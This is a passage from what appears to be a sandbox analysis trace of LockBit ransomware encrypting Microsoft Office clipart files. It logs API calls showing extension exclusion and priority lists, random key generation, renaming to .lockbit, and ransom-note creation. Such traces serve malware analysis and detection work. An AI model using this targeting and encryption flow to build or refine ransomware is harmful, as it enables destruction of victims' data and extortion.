lpFileSize=0x3df0140*=20578) returned 1 [0102.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3015c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3015c) returned 0x0 [0102.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3016c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3016c) returned 0x0 [0102.022] ReadFile (in: hFile=0xf04, lpBuffer=0x3df015c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 0x0 [0102.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.059] malloc (_Size=0xa6) returned 0x3df0008 [0102.059] NtSetInformationFile (FileHandle=0xf04, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.060] free (_Block=0x3df0008) [0102.060] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.060] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.060] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2efb2900, ftCreationTime.dwHighDateTime=0x1bd4b2f, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2efb2900, ftLastWriteTime.dwHighDateTime=0x1bd4b2f, nFileSizeHigh=0x0, nFileSizeLow=0x2a50, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00914_.WMF", cAlternateFileName="")) returned 1 [0102.060] lstrcmpiW (lpString1=".", lpString2="AN00914_.WMF") returned -1 [0102.060] lstrcmpiW (lpString1="..", lpString2="AN00914_.WMF") returned -1 [0102.060] PathFindExtensionW (pszPath="AN00914_.WMF") returned=".WMF" [0102.060] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.060] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.061] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.062] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.062] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00914_.WMF") returned 1 [0102.062] lstrcmpiW (lpString1="ntldr", lpString2="AN00914_.WMF") returned 1 [0102.062] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00914_.WMF") returned 1 [0102.062] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00914_.WMF") returned 1 [0102.062] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00914_.WMF") returned 1 [0102.062] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00914_.WMF") returned 1 [0102.062] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00914_.WMF") returned 1 [0102.062] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.062] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned=".WMF" [0102.063] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.063] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.063] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.064] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.064] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.064] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.064] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.lockbit") returned 72 [0102.064] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.066] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.066] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.066] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10832) returned 1 [0102.066] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.068] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.069] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.076] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.076] malloc (_Size=0xa6) returned 0x3df0008 [0102.076] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0102.082] free (_Block=0x3df0008) [0102.082] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.082] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.082] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.082] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9f500, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8b9f500, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x385c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00932_.WMF", cAlternateFileName="")) returned 1 [0102.082] lstrcmpiW (lpString1=".", lpString2="AN00932_.WMF") returned -1 [0102.082] lstrcmpiW (lpString1="..", lpString2="AN00932_.WMF") returned -1 [0102.082] PathFindExtensionW (pszPath="AN00932_.WMF") returned=".WMF" [0102.082] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.082] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.083] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.084] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.084] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN00932_.WMF") returned 1 [0102.084] lstrcmpiW (lpString1="ntldr", lpString2="AN00932_.WMF") returned 1 [0102.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN00932_.WMF") returned 1 [0102.084] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN00932_.WMF") returned 1 [0102.085] lstrcmpiW (lpString1="autorun.inf", lpString2="AN00932_.WMF") returned 1 [0102.085] lstrcmpiW (lpString1="thumbs.db", lpString2="AN00932_.WMF") returned 1 [0102.085] lstrcmpiW (lpString1="iconcache.db", lpString2="AN00932_.WMF") returned 1 [0102.085] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.085] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned=".WMF" [0102.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.085] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.085] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.086] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.086] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.lockbit") returned 72 [0102.086] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.087] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.087] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.087] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14428) returned 1 [0102.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.090] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0102.129] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.129] malloc (_Size=0xa6) returned 0x3df0008 [0102.129] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.186] free (_Block=0x3df0008) [0102.186] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.186] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.186] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.186] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc14efd00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc14efd00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x1ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN00965_.WMF", cAlternateFileName="")) returned 1 [0102.186] lstrcmpiW (lpString1=".", lpString2="AN00965_.WMF") returned -1 [0102.186] lstrcmpiW (lpString1="..", lpString2="AN00965_.WMF") returned -1 [0102.186] PathFindExtensionW (pszPath="AN00965_.WMF") returned=".WMF" [0102.186] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.186] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.186] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.186] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.187] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.187] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.188] lstrcmpiW 